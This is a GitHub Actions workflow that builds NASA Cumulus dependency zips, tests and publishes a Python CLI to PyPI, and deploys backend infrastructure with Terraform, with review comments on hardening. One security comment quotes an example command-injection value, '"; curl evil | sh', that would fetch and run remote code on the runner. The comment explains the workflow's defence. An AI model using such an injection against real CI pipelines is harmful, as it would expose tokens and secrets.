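name: Build and Deploy

# Triggers: every push to the listed branch patterns, plus manual dispatch.
# Which jobs actually run (and which environment they deploy to) is decided
# per job by the `if:` conditions and the commit-message markers below, not
# by this list.
on:
  push:
    branches:
      - develop
      - main
      - 'release/**'
      - 'feature/**'
      - 'issue/**'
      - 'issues/**'
      - 'dependabot/**'
  workflow_dispatch:

# Least-privilege default for the GITHUB_TOKEN. Jobs that must push (the
# version-bump commit and tag in `build`) raise `contents` to write explicitly;
# `create-zips` only reads, caches and uploads artifacts and needs nothing more.
permissions:
  contents: read

# One run per ref at a time, so two pushes to the same branch cannot race each
# other through `terraform apply`; a later run queues instead of cancelling.
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: false

env:
  # REGISTRY / IMAGE_NAME are not referenced by any job in this file —
  # presumably left over for (or intended for) a container-publish job
  # elsewhere; verify before relying on them.
  REGISTRY: ghcr.io
  IMAGE_NAME: ${{ github.repository }}
  # Versions are quoted so YAML does not read "3.10" as the float 3.1.
  PYTHON_VERSION: '3.10'
  POETRY_VERSION: '1.8.5'
  TERRAFORM_VERSION: '1.5.3'
  # Git ref of nasa/cumulus checked out by create-zips.
  CUMULUS_VERSION: 'v18.5.2'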
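jobs:
  create-zips:
    name: Create Cumulus Dependency Zips for Backend
    # Runs for deployable refs (develop / main / release/*) or for a pushed
    # commit whose message carries an explicit "/deploy sit" or "/deploy uat"
    # marker.
    # NOTE(review): the marker lets anyone who can push to any matched branch
    # (feature/**, issue/**, ...) — or whose text ends up in a squash-merge
    # body — trigger a deploy to UAT. A protected GitHub Environment with
    # required reviewers on terraform-deploy would add a human gate.
    if: |
      github.ref == 'refs/heads/develop' ||
      github.ref == 'refs/heads/main' ||
      startsWith(github.ref, 'refs/heads/release') ||
      contains(github.event.head_commit.message, '/deploy sit') ||
      contains(github.event.head_commit.message, '/deploy uat')
    runs-on: ubuntu-latest
    outputs:
      # Artifact ID of "cumulus-files". The previous definition referenced a
      # step id (`upload-files`) that no step declared, so it was always empty.
      cumulus_files_created: ${{ steps.upload-files.outputs.artifact-id }}
      # Lambda runtime derived from Cumulus' .nvmrc major version, e.g. "nodejs20.x".
      cumulus_node_version: ${{ steps.get_node_version.outputs.cumulus_node_version }}
    steps:
      - name: Checkout Cumulus Code
        uses: actions/checkout@v4
        with:
          repository: nasa/cumulus
          ref: ${{ env.CUMULUS_VERSION }}

      - name: Setup Python
        uses: actions/setup-python@v5
        with:
          python-version: ${{ env.PYTHON_VERSION }}

      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          node-version-file: '.nvmrc'
          cache: 'npm'
          cache-dependency-path: '**/package.json'

      - name: Read .nvmrc file
        id: get_node_version
        run: |
          # Major version only; tolerate an optional leading "v" ("v20.11.0" -> "20").
          MAJOR=$(cut -d '.' -f 1 .nvmrc)
          MAJOR="${MAJOR#v}"
          echo "cumulus_node_version=nodejs${MAJOR}.x" >> "$GITHUB_OUTPUT"

      - name: Cache Node Modules
        id: cache-node-modules
        uses: actions/cache@v4
        with:
          path: |
            node_modules
            */*/node_modules
          key: node-modules-${{ env.CUMULUS_VERSION }}-${{ hashFiles('**/package-lock.json') }}

      # Built lambda zips plus the terraform module files we copy out below.
      # `retention-days` is not an actions/cache input (it belongs to
      # upload-artifact) and was silently ignored; cache entries are evicted
      # after 7 days without access, so a miss here must trigger a rebuild.
      - name: Cache Build Outputs
        id: cache-build
        uses: actions/cache@v4
        with:
          path: |
            tasks/post-to-cmr/dist
            tasks/hyrax-metadata-updates/dist
            tf-modules/cumulus
          key: backfill-tool-cumulus-build-${{ env.CUMULUS_VERSION }}

      # Rebuild when EITHER cache missed. Previously only the node_modules
      # cache was consulted, so a node_modules hit with an evicted build cache
      # skipped the build and the `cp` of dist/lambda.zip below failed.
      - name: Install Dependencies
        if: steps.cache-node-modules.outputs.cache-hit != 'true' || steps.cache-build.outputs.cache-hit != 'true'
        run: |
          npm install -g lerna
          npm install
          npm run bootstrap

      - name: Prepare and Upload Files
        run: |
          # Fail fast with a clear message if the build did not produce what we ship.
          for f in tasks/post-to-cmr/dist/lambda.zip \
                   tasks/hyrax-metadata-updates/dist/lambda.zip \
                   tf-modules/cumulus/ecs_cluster_instance_autoscaling_cf_template.yml.tmpl \
                   tf-modules/cumulus/task-reaper.sh; do
            [[ -f "$f" ]] || { echo "::error::expected build output missing: $f"; exit 1; }
          done
          mkdir -p temp
          cp tasks/post-to-cmr/dist/lambda.zip temp/post_to_cmr.zip
          cp tasks/hyrax-metadata-updates/dist/lambda.zip temp/hyrax-metadata-updates.zip
          cp tf-modules/cumulus/ecs_cluster_instance_autoscaling_cf_template.yml.tmpl temp/
          cp tf-modules/cumulus/task-reaper.sh temp/

      - name: Upload Artifacts
        id: upload-files
        uses: actions/upload-artifact@v4
        with:
          name: cumulus-files
          path: temp/
          if-no-files-found: error
          retention-days: 1

  build:
    name: Build and Test CLI Tool
    # No `if: always()` here: with no `needs`, the job already runs on every
    # trigger, and `always()` additionally made it start even after the run
    # was cancelled — undesirable for a job that pushes tags and publishes
    # to PyPI.
    runs-on: ubuntu-latest
    permissions:
      contents: write  # pushes the version-bump commit and tag
      # `packages: write` was granted before but no step in this job publishes
      # a package image; dropped to keep the token to what the job uses.
    outputs:
      target_env_uppercase: ${{ steps.set-env.outputs.target_env_uppercase }}
      target_env_lowercase: ${{ steps.set-env.outputs.target_env_lowercase }}
      new_version: ${{ steps.set-env.outputs.new_version }}
    steps:
      - name: Checkout Code
        uses: actions/checkout@v4
        with:
          fetch-depth: 0  # full history for `git rev-parse` and the tag push below

      - name: Setup Python
        uses: actions/setup-python@v5
        with:
          python-version: ${{ env.PYTHON_VERSION }}

      - name: Install Poetry
        uses: abatilo/actions-poetry@v3
        with:
          poetry-version: ${{ env.POETRY_VERSION }}

      - name: Cache Poetry Dependencies
        uses: actions/cache@v4
        with:
          path: ~/.cache/pypoetry
          key: ${{ runner.os }}-poetry-${{ hashFiles('**/poetry.lock') }}
          restore-keys: |
            ${{ runner.os }}-poetry-

      # Branch -> default target environment and next version:
      #   issue/* feature/* dependabot/* -> SIT, <version>+<short sha>
      #   develop                        -> SIT, bump or append -alpha.N
      #   release/*                      -> UAT, bump or append -rc.N
      #   main                           -> OPS, strip any -rc/-alpha suffix
      # The ref is read from $GITHUB_REF rather than interpolating
      # ${{ github.ref }} into the script text.
      - name: Set Default Version and Environment
        id: default-version
        run: |
          echo "pyproject_name=$(poetry version | awk '{print $1}')" >> "$GITHUB_ENV"
          VERSION=$(poetry version | awk '{print $2}')
          if [[ "$GITHUB_REF" =~ ^refs/heads/(issue|feature|dependabot)/ ]]; then
            echo "TARGET_ENV_UPPERCASE=SIT" >> "$GITHUB_ENV"
            NEW_VERSION="${VERSION}+$(git rev-parse --short HEAD)"
          elif [[ "$GITHUB_REF" == "refs/heads/develop" ]]; then
            echo "TARGET_ENV_UPPERCASE=SIT" >> "$GITHUB_ENV"
            if [[ ${VERSION} =~ -alpha ]]; then
              ALPHA_NUM=$(echo "${VERSION}" | grep -oP '(?<=-alpha.)\d+' || echo "0")
              NEW_VERSION="${VERSION%-alpha.*}-alpha.$((ALPHA_NUM+1))"
            else
              NEW_VERSION="${VERSION}-alpha.1"
            fi
          elif [[ "$GITHUB_REF" =~ ^refs/heads/release/ ]]; then
            echo "TARGET_ENV_UPPERCASE=UAT" >> "$GITHUB_ENV"
            if [[ ${VERSION} =~ -rc ]]; then
              RC_NUM=$(echo "${VERSION}" | grep -oP '(?<=-rc.)\d+' || echo "0")
              NEW_VERSION="${VERSION%-rc.*}-rc.$((RC_NUM+1))"
            else
              NEW_VERSION="${VERSION}-rc.1"
            fi
          elif [[ "$GITHUB_REF" == "refs/heads/main" ]]; then
            echo "TARGET_ENV_UPPERCASE=OPS" >> "$GITHUB_ENV"
            NEW_VERSION="${VERSION%-rc*}"
            NEW_VERSION="${NEW_VERSION%-alpha*}"
          else
            # e.g. workflow_dispatch from an unlisted branch: keep the current
            # version and leave TARGET_ENV unset (terraform-deploy will not run).
            NEW_VERSION="${VERSION}"
          fi
          echo "new_version=${NEW_VERSION}" >> "$GITHUB_ENV"

      # SECURITY: the commit message is attacker-influenced text (anyone who
      # can push to a matched branch, and squash-merge bodies can carry PR
      # commit text). It is handed to the script through an environment
      # variable and never interpolated with ${{ }} into the script body, so
      # a message such as `"; curl evil | sh` cannot execute on the runner
      # with this job's token and secrets.
      - name: Override Environment for Deploy Command
        if: contains(github.event.head_commit.message, '/deploy')
        env:
          COMMIT_MESSAGE: ${{ github.event.head_commit.message }}
        run: |
          # Only sit/uat may be selected; OPS deploys come solely from main.
          # First marker wins, so a message with both markers cannot write a
          # malformed multi-line value into GITHUB_ENV.
          override_env=$(grep -oE '/deploy (sit|uat)' <<< "$COMMIT_MESSAGE" | head -n 1 | awk '{print $2}' || true)
          if [[ -n "$override_env" ]]; then
            override_env_upper=$(tr '[:lower:]' '[:upper:]' <<< "$override_env")
            echo "TARGET_ENV_UPPERCASE=${override_env_upper}" >> "$GITHUB_ENV"
            echo "TARGET_ENV_LOWERCASE=${override_env}" >> "$GITHUB_ENV"
            echo "Overriding deployment target to: ${override_env_upper}"
          fi

      - name: Set Lowercase Environment
        run: |
          echo "TARGET_ENV_LOWERCASE=$(tr '[:upper:]' '[:lower:]' <<< "${TARGET_ENV_UPPERCASE:-}")" >> "$GITHUB_ENV"

      - name: Update Package Version
        run: poetry version "$new_version"

      - name: Build, Install and Test
        run: |
          poetry build
          poetry install
          poetry run pylint podaac
          poetry run flake8 podaac
          poetry run pytest --junitxml=build/reports/pytest.xml --cov=podaac/ --cov-report=html -m "not aws and not integration" tests/

      # NOTE(review): `snyk monitor` snapshots the dependency tree to the Snyk
      # dashboard; as far as the Snyk CLI documents it, `--severity-threshold`
      # and `--fail-on` gate `snyk test`, so this step does not appear to fail
      # the build on findings. Use `command: test` if it is meant to gate.
      # `@master` is a floating ref for a third-party action that receives
      # SNYK_TOKEN — pin it to a release tag or commit SHA.
      - name: Run Snyk Security Scan
        uses: snyk/actions/python@master
        env:
          SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
        with:
          command: monitor
          args: >
            --org=${{ secrets.SNYK_ORG_ID }}
            --project-name=${{ github.repository }}
            --severity-threshold=high
            --fail-on=all

      # Pushes with GITHUB_TOKEN, which does not re-trigger this workflow.
      - name: Commit Version Changes
        if: |
          github.ref == 'refs/heads/develop' ||
          github.ref == 'refs/heads/main' ||
          startsWith(github.ref, 'refs/heads/release')
        run: |
          if [[ -n "$(git status --porcelain)" ]]; then
            git config user.name "${GITHUB_ACTOR}"
            git config user.email "${GITHUB_ACTOR}@users.noreply.github.com"
            git commit -am "/version ${new_version}"
            git tag -a "${new_version}" -m "Version ${new_version}"
            git push --follow-tags
          fi

      # NOTE(review): both publish steps use long-lived API tokens held as
      # repository secrets. PyPI / Test PyPI trusted publishing (OIDC, needs
      # `id-token: write`) would remove the static credential.
      - name: Publish to Test PyPI
        if: |
          github.ref == 'refs/heads/develop' ||
          startsWith(github.ref, 'refs/heads/release')
        env:
          POETRY_PYPI_TOKEN_TESTPYPI: ${{ secrets.TEST_PYPI_API_TOKEN }}
        run: |
          poetry config repositories.testpypi https://test.pypi.org/legacy/
          poetry publish -r testpypi

      - name: Publish to PyPI
        if: github.ref == 'refs/heads/main'
        env:
          POETRY_PYPI_TOKEN_PYPI: ${{ secrets.PYPI_API_TOKEN }}
        run: poetry publish --skip-existing

      - name: Set Environment Output
        id: set-env
        run: |
          {
            echo "target_env_uppercase=${TARGET_ENV_UPPERCASE:-}"
            echo "target_env_lowercase=${TARGET_ENV_LOWERCASE:-}"
            echo "new_version=${new_version:-}"
          } >> "$GITHUB_OUTPUT"

  terraform-deploy:
    name: Deploy Backend Infrastructure Terraform
    needs: [create-zips, build]
    # Same gate as create-zips (the cumulus-files artifact must exist).
    # success() is implied because no status function appears in the
    # expression, so a failed build or zip job skips the deploy.
    if: |
      github.ref == 'refs/heads/develop' ||
      github.ref == 'refs/heads/main' ||
      startsWith(github.ref, 'refs/heads/release') ||
      contains(github.event.head_commit.message, '/deploy sit') ||
      contains(github.event.head_commit.message, '/deploy uat')
    runs-on: ubuntu-latest
    # This job only checks out and downloads an artifact; nothing pushes to
    # the repo or to GHCR, so the previous contents/packages: write grants
    # were unused.
    permissions:
      contents: read
    env:
      TARGET_ENV: ${{ needs.build.outputs.target_env_lowercase }}
    steps:
      # Environment-specific secrets are selected by name below; an empty or
      # unexpected target would resolve every one of them to "" and run
      # terraform against whatever default credentials it finds. Refuse
      # anything other than the three known targets before touching AWS.
      - name: Validate Deployment Target
        run: |
          case "$TARGET_ENV" in
            sit|uat|ops) echo "Deploying to ${TARGET_ENV}" ;;
            *) echo "::error::unsupported deployment target '${TARGET_ENV}'"; exit 1 ;;
          esac

      - name: Checkout Code
        uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Download Cumulus Files
        uses: actions/download-artifact@v4
        with:
          name: cumulus-files
          path: ./terraform-deploy

      - name: Setup Terraform
        uses: hashicorp/setup-terraform@v3
        with:
          terraform_version: ${{ env.TERRAFORM_VERSION }}

      - name: Deploy with Terraform
        working-directory: terraform-deploy/
        env:
          # Static IAM user keys selected per target environment.
          # NOTE(review): OIDC via aws-actions/configure-aws-credentials
          # (`id-token: write` + a role ARN per environment) would replace
          # these long-lived secrets with short-lived credentials.
          AWS_ACCESS_KEY_ID: ${{ secrets[format('AWS_ACCESS_KEY_ID_SERVICES_{0}', needs.build.outputs.target_env_uppercase)] }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets[format('AWS_SECRET_ACCESS_KEY_SERVICES_{0}', needs.build.outputs.target_env_uppercase)] }}
          AWS_ACCOUNT_ID: ${{ secrets[format('AWS_ACCOUNT_ID_SERVICES_{0}', needs.build.outputs.target_env_uppercase)] }}
          AWS_DEFAULT_REGION: us-west-2
          TF_VAR_permissions_boundary_arn: ${{ secrets[format('PERMISSIONS_BOUNDARY_ARN_{0}', needs.build.outputs.target_env_uppercase)] }}
          TF_VAR_buckets_name: ${{ secrets[format('BUCKET_{0}', needs.build.outputs.target_env_uppercase)] }}
          TF_VAR_system_bucket: ${{ secrets[format('SYSTEM_BUCKET_{0}', needs.build.outputs.target_env_uppercase)] }}
          TF_VAR_dmrpp_url: ${{ secrets.DMRPP_URL }}
          TF_VAR_aws_security_group_ids: ${{ secrets[format('SECURITY_GROUP_IDS_{0}', needs.build.outputs.target_env_uppercase)] }}
          TF_VAR_cumulus_node_version: ${{ needs.create-zips.outputs.cumulus_node_version }}
          APP_VERSION: ${{ needs.build.outputs.new_version }}
          # Pre-release build of the metadata aggregator lambda, pinned by tag.
          METADATA_AGGREGATOR_URL: https://github.com/podaac/cumulus-metadata-aggregator/releases/download/v8.7.0-alpha.6-SNAPSHOT/cumulus-metadata-aggregator-8.7.0-alpha.6-SNAPSHOT.zip
        run: |
          # --fail: without it curl saves the HTTP error body as the "zip" and
          # terraform packages it. The release tag pins the version but nothing
          # here verifies the archive's integrity — TODO: check a sha256 of the
          # download before it is deployed.
          curl --fail --silent --show-error --location --output metadata-aggregator.zip "$METADATA_AGGREGATOR_URL"
          python3 override.py "$TARGET_ENV"
          source bin/config.sh "$TARGET_ENV"
          # -input=false: never block on an interactive prompt in CI.
          terraform init -input=false
          terraform plan -input=false -var-file="tfvars/${TARGET_ENV}.tfvars" -var="app_version=${APP_VERSION}" -out=tfplan
          terraform apply -input=false -auto-approve tfplan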